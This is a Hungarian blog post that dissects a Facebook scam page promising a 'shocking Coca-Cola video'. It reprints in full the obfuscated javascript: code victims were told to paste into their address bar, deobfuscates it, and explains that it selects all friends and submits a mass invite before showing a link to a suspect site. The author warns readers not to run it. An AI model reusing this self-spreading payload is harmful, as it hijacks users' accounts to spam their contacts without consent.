Kaptam egy meghívót egy ismerősömtől az "AFTER THIS VIDEO, YOU WONT EVER THINK OF COCA-COLA ANYMORE!!" nevű Facebook csoportba. Na most én amúgy se szoktam kólát inni, így az oldal mérsékelt lelkesedést váltott ki belőlem. Az viszont az első pillanatban feltűnt, hogy ez valószínűleg valamiféle átverés akar lenni.
Hogy miért is?
Kezdjük az utasításokkal. (Akit csak a videó érdekel, és nem kíván foglalkozni a részletekkel, az görgessen a legaljára.)
WATCH THE SHOCKING VIDEO THAT MADE PEOPLE CHANGE THEIR MINDS ABOUT DRINKING COCA-COLA EVER AGAIN!!!
Please follow this simple steps to get started.
Step 1: "Become a Fan"
Step 2: "Suggest to Friends" and suggest all of your friends to the page.
Step 3: "Click on the "SHOCKING VIDEO" Tab Under the page name to continue"
If you follow all this steps correctly you will watch the shocking coca-cola video!!!
*WARNING
This video may not be suitable for kids!
Aha. Azaz megvan a terjedés metodikája: hívd meg az összes barátodat! Az első lépés még úgy-ahogy oké, a Facebook le is tudja ellenőrizni, hogy tényleg rajongója vagy-e az adott oldalnak, és ettől függően (nem) jelenít meg bizonyos tartalmakat. Azt viszont nem tudja kideríteni, hogy kit hívtál meg. Érdemes megfigyelni a csábító részeket, például a figyelmeztetést. Ilyen amúgy máshol is szerepel, a Shocking Video tabon például ez a kép fogad: 
Szerintem inkább figyelemfelkeltő és reklámcélú, mint figyelmeztető.
Tehát első lépés, rajongó lettem. Kizárólag a kíváncsiság kedvéért, hogy mivel is akarnak átszabni. Figyelem, ezt csak akkor próbáld ki otthon, a saját gépeden, ha tudod, mit teszel.
Valóban, ez után már más is látszik a lényegi tabon a "You must be a fan of this page to Watch The Shocking Video!" szövegen kívül a következő is: "Copy the code below and paste it on your address bar and hit enter to continue", amit egy apró szövegdoboz követ, benne egy jóóó hosszú kóddal, ami úgy kezdődik, hogy "javascript:...".
A webes technológiákhoz kevésbé értők számára ezt kb. úgy tudnám szemléltetni, mintha egy sikátorból kiszólna egy ballonkabátos alak: "Hé, haver, ezt látnod kell. De ahhoz, hogy megmutassam, előbb hívd ide az összes haverodat, majd add be magadnak ezt az injekciót. Utána megmutatom, becsszó." Ennek gondolom kicsit kevesebben dőlnének be, mint a javascriptes trükknek.
Nyilván kíváncsi voltam, hogy mi is az a javascript, így hát kimásoltam. Figyelem, ezt itt NE másold be a böngésződ címsorába, légyszi :)
javascript:var _0x89f8=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x27\x73\x75\x67\x67\x65\x73\x74\x27\x20\x68\x72\x65\x66\x3D\x27\x23\x27\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x27\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x31\x35\x36\x31\x35\x30\x35\x35\x33\x34\x31\x31\x31\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x27\x20\x72\x65\x6C\x3D\x27\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x27\x3E\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"]; void (document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]=_0x89f8[3]);var ss=document[_0x89f8[2]](_0x89f8[4]);var c=document[_0x89f8[6]](_0x89f8[5]);c[_0x89f8[8]](_0x89f8[7],true,true); void (ss[_0x89f8[9]](c)); void (setTimeout(function (){fs[_0x89f8[10]]();} ,3000)); void (setTimeout(function (){SocialGraphManager[_0x89f8[13]](_0x89f8[11],_0x89f8[12]);} ,4000));void (setTimeout(function(){document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]= '\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x63\x6b\x69\x6e\x67\x63\x6f\x63\x61\x2d\x63\x6f\x6c\x61\x76\x69\x64\x65\x6f\x2e\x62\x6c\x6f\x67\x73\x70\x6f\x74\x2e\x63\x6f\x6d\x2f\x22\x3e\x43\x6c\x69\x63\x6b\x20\x74\x6f\x20\x57\x61\x74\x63\x68\x20\x56\x69\x64\x65\x6f\x3c\x2f\x61\x3e';} ,4500));
Kezeket fel, aki érti, hogy mit csinál ez a kód! Ühüm, ez várható volt. Ugyanis ez az ún. obfuscated kód mintapéldája, aminek a működését a készítője direkt elrejtette. Azaz nem csak azt várja el tőlünk a hacker néni/bácsi, hogy futtassuk a kódját, de azt is feltételezi, hogy ha tudnánk, mi az a kód, akkor eszünk ágában se lenne elfuttatni. Egyre érdekesebb a játék :)
Ami rövidebb vizsgálódás után látszik erről a kódról: Az elején létrehoz egy stringekből (mert idézőjelek között szerepel egy rakás kiescapelt karakter) álló tömböt ([] jelek között vesszővel elválasztott elemek) (_0x89f8 néven), aminek az elemeit később beilleszti egy részben értelmes kódba (pl: _0x89f8[8]).
Nosza, fejtsük vissza a kódot. Szövegszerkesztőben a Csere opcióval cseréljünk ki minden "\x" részletet "%"-ra, majd a kapott szöveget adjuk oda egy ún. unescaper eszköznek, mely képes visszaalakítani a kódolt karaktereket (pl: http://www.patzcatz.com/unescape.htm).
Ekkor a következő kód tárul elénk:
javascript:var_0x89f8=["innerHTML","app4949752878_dd","getElementById","<a id='suggest' href='#' ajaxify='/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=111561505534111' class=' profile_action actionspro_a' rel='dialog-post'></a>","suggest","MouseEvents","createEvent","click","initEvent", "dispatchEvent","select_all","sgm_invite_form","/ajax/social_graph/invite_dialog.php", "submitDialog"];void(document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]=_0x89f8[3]);varss=document[_0x89f8[2]](_0x89f8[4]);varc=document[_0x89f8[6]](_0x89f8[5]);c[_0x89f8[8]](_0x89f8[7],true,true);void(ss[_0x89f8[9]](c));void(setTimeout(function(){fs[_0x89f8[10]]();},3000));void(setTimeout(function(){SocialGraphManager[_0x89f8[13]](_0x89f8[11],_0x89f8[12]);},4000));void(setTimeout(function(){document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]='<a href="http://shockingcoca-colavideo.blogspot.com/">Click to Watch Video</a>';},4500));
Mindjárt jobb, de még lehet rajta javítani. Tegyük is meg. Például végezzük el a sztringtömb elemeinek behelyettesítését az alsó kódszakaszba, meg rendezzük el olvashatóan az egészet.
javascript:var_0x89f8=[
"innerHTML",
"app4949752878_dd",
"getElementById",
"<a id='suggest' href='#' ajaxify='/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=111561505534111' class=' profile_action actionspro_a' rel='dialog-post'></a>",
"suggest",
"MouseEvents",
"createEvent",
"click",
"initEvent",
"dispatchEvent",
"select_all",
"sgm_invite_form",
"/ajax/social_graph/invite_dialog.php",
"submitDialog"];
void(document[getElementById](app4949752878)[innerHTML]=<a id='suggest' href='#' ajaxify='/ajax/social_graph/invite_dialog.php?class=FanManager&
node_id=111561505534111' class=' profile_action actionspro_a' rel='dialog-post'></a>);
varss=document[getElementById](suggest);
varc=document[createEvent](MouseEvents);
c[initEvent](click,true,true);
void(ss[dispatchEvent](c));
void(setTimeout(function(){fs[select_all]();},3000));
void(setTimeout(function(){SocialGraphManager[submitDialog](sgm_invite_form,/ajax/social_graph/invite_dialog.php);},4000));
void(setTimeout(function(){document[getElementById](app4949752878)[innerHTML]='<a href="http://shockingcoca-colavideo.blogspot.com/">Click to Watch Video</a>';},4500));
Na itt már nem vagyok 100%-ig biztos abban, hogy mit is csinál a kód, de gyanítom, hogy megnyit egy dialógusablakot, amiben ajánlhatsz (suggest, FanManager) valamit az ismerőseidnek, majd utána gyorsan rá is kattint a megfelelő gombra (createEvent, MouseEvents, click), beküldi a formot a Facebooknak (submitDialog), és végül feldob egy linket, ami a (NE NYISD MEG!) http://shockingcoca-colavideo.blogspot.com/ oldalra mutat. Mindenesetre közben van még egy ilyen, hogy "SocialGraphManager", erről kiderült, hogy egy Facebook alkalmazás (http://www.facebook.com/apps/application.php?id=67235693709) egyetlen, egzotikus nevű felhasználóval (nyilván az admin).
A végre megszerzett oldal szintén gyaníthatóan támadó jellegű kódot tartalmaz, ezért nem javaslom a megnyitását. Akit érdekel, annak itt a forráskódja: http://pastebin.ca/1861790
Akit pedig a videó érdekel, annak nem lövöm le a poént, tessék megnézni, hogy mi az a fantasztikus, sokkoló videó, melyet csak erős gyomrúaknak ajánlanak, és ami örökre megváltoztathatja az életed, de minimum a kólaivásról le fogsz szokni miatta: https://www.youtube.com/v/1IdURkDniB0
És igen, még a videó is arra kér, hogy továbbítsd az ismerőseidnek. De te ugye nem tennél ilyet, főleg ezek után?
Utolsó kommentek